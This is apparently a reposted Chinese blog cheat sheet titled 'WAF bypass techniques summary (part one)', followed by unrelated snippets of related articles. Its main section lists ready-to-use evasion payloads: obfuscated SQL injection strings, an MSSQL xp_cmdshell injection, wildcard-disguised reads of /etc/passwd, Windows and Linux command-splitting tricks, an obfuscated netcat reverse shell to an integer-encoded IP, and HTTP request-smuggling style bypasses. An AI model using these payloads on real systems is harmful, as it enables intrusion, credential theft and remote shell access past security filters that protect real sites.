【WAF绕过】姿势总结(一)

news2024/12/28 2:21:02

【WAF绕过】姿势总结(一)

 

方法

Payload

编码

1、进行url编码(少数waf不会进行URL解码,部分waf进行一次url解码==>可对payload进行二次url编码)

2、Unicode编码:单引号 = %u0027、%u02b9、%u02bc

3、部分十六进制编码:adminuser = 0x61646D696E75736572

SQL编码:unicode、HEX、URL、ascll、base64等

5、XSS编码:HTML、URL、ASCII、JS编码、base64等

大小写变换

select = SELecT

关键字替换

And = &&

Or = ||

等于号 = like (或使用’<’ 和 ‘>’ 进行判断)

if(a,b,c) = case when(A) then B else C end

substr(str,1,1) = substr (str) from 1 for 1

limit 1,1 = limit 1 offset 1

Union select 1,2 = union select * from ((select 1)A join (select 2)B;

hex()、bin() = ascii()

sleep() = benchmark()

concat_ws() = group_concat()

mid()、substr() = substring()

@@user = user()

@@datadir = datadir()

特殊字符替换(空格或注释绕过)

sqlserver中:/**/、/*|%23--%23|*/ 

mysql中: %0a、%0a/**/、//*!*//、#A%0a

特殊字符重写绕过

selselectect

多请求拆分绕过

?a=[inputa]&b=[inputb]  ===》(参数拼接)  and a=[inputa] and b=[inputb]

参数放Cookie里面进行绕过

$_REQUEST(获取参数,会获取GET POST COOKIE)===>  若未检测cookie,我们可以放cookie里面

使用白名单绕过

admin dede install等目录特殊目录在白名单内

URL/xxx.php?id=1 union select …… ===》

1、URL/xxx.php/admin?id=1 union select……

2、URL/admin/..\xxx.php?id=1 union select……

内联注释绕过

id=1 and 1=1 ===》  id=1/*!and*/1=1

参数重写绕过

URL/xx.php?id=1 union select  ===》

URL/xx.php?id=1&id=union&id=select&id=……&id=

特殊字符拼接

mssql中,函数里面可以用+来拼接

?id=1;exec('maste'+'r..xp'+'_cmdshell'+'"net user"')

Windows特性

利用符号分割字符:whoami ==》 ((((Wh^o^am””i)))) 

利用变量分割关键字:whoami ==》 set a=who&&b=ami&&call %a%%b%

设置一个变量:set a=123whoami456  ===》 取出变量a的第3位开始共计6个字符:echo %a:~3,6%  ===》执行取出的值:%a:~3,6%

Linux特性

单引号或双引号连接符:whoami = w’h’o’a’m”i”

?,*通配符:Cat /etc/passwd = cat /?t*/??ss**

[] 通配符,匹配【】中的字符:whoami = /b[12312i]n/w[23sh]oa[2msh]i

变量拼接:Whoami = a=who&&b=ami&&$a$b

目录穿越:cat /../../etc/passwd =cd ..&&cd ..&&cd etc&&cat passwd

Shell反弹(127.0.0.1 → 2130706433):nc -e /bin/bash 127.0.0.1 1234 =/??n/?c -e /??n/b??h 2130706433 1234

云waf

===》找真实IP

bp插件

bypass waf

http协议绕过

Content-Type绕过:application/x-www-form-urlencoded è multipart/form-data

请求方式绕过:更换请求方法

多Content-Disposition绕过:包含多个Content-Disposition时,中间件与waf取值不同 

keep-alive(Pipeline)绕过:手动设置Connection:keep-alive(未断开),然后在http请求报文中构造多个请求,将恶意代码隐藏在第n个请求中,从而绕过waf

修改编码方式:Charset=xxx进行绕过

Waf检测限制绕过

参数溢出

缓冲区溢出:

UnIoN SeLeCT ===》 and (select 1)=(Select 0xA*99999) UnIoN SeLeCT

and 1=1 ===》 and 1=1 and 99…99999 //此处省略N多个9

同网段/ssrf绕过

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/559205.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Python可视化神器Seaborn入门系列——kdeplot

Seaborn是基于matplotlib的Python可视化库。 它提供了一个高级界面来绘制有吸引力的统计图形。Seaborn其实是在matplotlib的基础上进行了更高级的API封装&#xff0c;从而使得作图更加容易&#xff0c;不需要经过大量的调整就能使你的图变得精致。但应强调的是&#xff0c;应该…

ChatGPT 火爆全球,我们能抓住的下一个风口在哪?

中国互联网行业正面临着巨大的压力和挑战&#xff0c;但也孕育着新的发展机遇。当下正值ChatGPT火爆&#xff0c;整个互联网行业充满了机遇和挑战&#xff0c;身处其中的我们能抓住什么呢&#xff1f; 思你所思&#xff0c;帮大家整理出了五大风口&#xff01;希望对大家有所帮…

html SpeechSynthesis文字转语音

web 页面使用speechSynthesis实现文字转语音 网页语音 API 的SpeechSynthesis 接口是语音服务的控制接口&#xff1b;它可以用于获取设备上关于可用的合成声音的信息&#xff0c;开始、暂停语音&#xff0c;或除此之外的其他命令。 属性 SpeechSynthesis 也从它的父接口继承属…

腾讯云服务器选择购买流程(一步步详细配置)

腾讯云服务器购买流程直接在官方活动上选择比较合适&#xff0c;在云服务器CVM或轻量应用服务器页面自定义购买费用比较贵&#xff0c;但是自定义购买云服务器CPU内存带宽配置选择范围广&#xff0c;活动上购买只能选择固定的活动机&#xff0c;选择范围窄&#xff0c;但是云服…

数据结构 -- 队列

1、Queue队列 先进先出 2、双端队列 --- Deque Deque的实现类是LinkedList,ArrayDeque,LinkedBlockingDeque。 ArrayDeque底层实现是数组&#xff0c;LinkedList底层实现是链表。 双端队列可以作为普通队列使用&#xff0c;也可以作为栈使用。Java官方推荐使用Deque替代Stac…

【flask + sqlalchemy】连接clickhouse数据库的踩的坑,在这里记录一下

文章目录 前言1. 发现问题2. 复盘2.1 上面试一次错误的问题记录2.2 flask使用clickhouse2.2.1 配置2.2.2 orm2.3 如何插入数据 前言 使用clickhouse有一段时间了&#xff0c;现在要重构一个项目&#xff0c;重度依赖clickhouse&#xff0c;现在终于理顺了&#xff0c;记录一下…

数据库管理-第七十七期 再探分布式(20230523)

数据库管理 2023-05-23 第七十七期 再探分布式1 单机分布式2 分布式改造3 尝试改造一个订单系统3.1 表类型和分片键选择3.2 扩展分片3.3 业务扩展 总结 第七十七期 再探分布式 上一次系统探讨分布式数据库还是在第三十六期&#xff0c;经过大半年的“进步”加上中间参加了不少…

Linux启动过程的问题解决

文章目录 Linux启动过程的问题解决忘记root密码的解决因文件系统错误而无法启动 Linux启动过程的问题解决 当我们在使用Linux时&#xff0c;可能会因为某些设置或突然断电等原因导致文件系统出现错误&#xff0c;从而导致Linux无法正常启动。但这并不意味着我们需要重新安装系…

ASEMI代理长电可控硅MAC97A8图片,MAC97A8大小

编辑-Z 长电可控硅MAC97A8参数&#xff1a; 型号&#xff1a;MAC97A8 VDRM/VRRM&#xff1a;600V IT(RMS)&#xff1a;1A ITSM&#xff1a;8A 栅极电流&#xff08;峰值&#xff09;&#xff1a;1A 栅极电压&#xff08;峰值&#xff09;&#xff1a;5V 栅极功率&#…

翼辉+飞腾全国产实时操作系统与全国产主板工控方案在电力产品的应用

SylixOS&#xff08;MS-RTOS&#xff09;电力产品应用简介 一、电网传统装置&#xff1a; 继电保护、测控、稳控、PMU、时间同步、故障录波等装置&#xff08;输变电&#xff09; 一般使用AMP方案&#xff0c;少数客户使用SMP方案。2019年11月使用SylixOS的国内首台100%全国…

centos8 安装mysql8

1、下载mysql8软件库 wget https://repo.mysql.com//mysql80-community-release-el8-3.noarch.rpm 2、安装软件库 rpm -ivh mysql80-community-release-el8-3.noarch.rpm 3、安装mysql yum install mysql-server 4、启动mysql systemctl start mysqld systemctl enable…

【非集中申请期】国家自然科学基金最新申请指南情况汇总

2023年国自然集中申请期函评季临近尾声。当下&#xff0c;申请人除了在日常的科研工作中也要合理、及时的关注一些非集中申请期的项目动态&#xff0c;恰如2023年各类非集中期申请项目指南正在陆续发布中&#xff0c;这些仍然是非常好的申请机会。近期的项目指南名称与申请截止…

快速上手MATLAB:科研、工程、数据分析,MATLAB入门(下)教你基础知识!分享《MATLAB初学者教程 MATLAB编程-菜鸟入门(清晰版)》

快速上手MATLAB&#xff1a;科研、工程、数据分析&#xff0c;MATLAB入门&#xff08;上&#xff09;教你基础知识&#xff01; 福利&#xff1a;文末有资料分享&#xff01;&#xff01;前言一、文件读取1. 工作空间数据读取2. 文本文件读取3. 常用的数据导入和导出函数4. 图像…

不吹不黑,安利5个网工必备工具包

大家好&#xff0c;我是老杨。 要说网工的好用工具&#xff0c;你心里肯定有不少选项。工具常用常新&#xff0c;与时俱进&#xff0c;但你的思维却不一定。 研究一个新工具&#xff0c;除了能提升你的工作效率&#xff0c;也能对你的认知有所开拓和提升。 所以&#xff0c;…

《程序员面试金典(第6版)》面试题 02.01. 移除重复节点(哈希映射,多指针暴力破解,链表)

题目描述 编写代码&#xff0c;移除未排序链表中的重复节点。保留最开始出现的节点。 题目传输门&#xff1a;面试题 02.01. 移除重复节点 示例1: 输入&#xff1a;[1, 2, 3, 3, 2, 1]输出&#xff1a;[1, 2, 3]示例2: 输入&#xff1a;[1, 1, 1, 1, 2]输出&#xff1a;[1, 2]…

Hive---拉链表设计与实现

1 数据同步问题 Hive在实际工作中主要用于构建离线数据仓库&#xff0c;定期的从各种数据源中同步采集数据到Hive中&#xff0c;经过分层转换提供数据应用。比如每天需要从MySQL中同步最新的订单信息、用户信息、店铺信息等到数据仓库中&#xff0c;进行订单分析、用户分析。 …

【C++修炼之路】定位new(项目记录)

————————————每一个不曾起舞的日子都是对生命的辜负。 C之定位new 1. 什么是定位new2. 定位new的语法3. 具体实例 1. 什么是定位new 一般的new运算符负责在heap堆中找到一个足以能够满足要求的内存块。 而定位new&#xff08;Placement new&#xff09;是C中的一…

运行100万个并发任务,不同语言各需要多少内存

作者&#xff1a;DataStax 公司&#xff08;美国的一家数据库系统开发商&#xff09;Piotr Kołaczkowski 原文见&#xff1a; https://pkolaczk.github.io/memory-consumption-of-async/ 在这篇博客文章中&#xff0c;探讨了处理大量网络连接时候的Rust、Go、Java、C#、Pyth…

企企通“码上顺”清洗工具 | 让数据更有价值,让业务更出色

数据清理工作是企业数据管理、数据治理中的最基础的工作之一&#xff0c;不仅是一项苦活、累活&#xff0c;也是一个既考验业务又检验技术的活。 物料主数据作为企业核心的数据资产&#xff0c;在智慧供应链、业财一体化等数字化建设中发挥着重要作用。在当今高速发展的商业环…

《汇编语言》- 读书笔记 - 实验2 用机器指令和汇编指令编程

《汇编语言》- 读书笔记 - 实验2 用机器指令和汇编指令编程 1. 预备知识: Debug 的使用2 .实验任务 1. 预备知识: Debug 的使用 统一完善到&#xff1a;实验 1 查看 CPU 和内存&#xff0c;用机器指令和汇编指令编程。不在这拆开写了。 2 .实验任务 使用 Debug&#xff0c;将…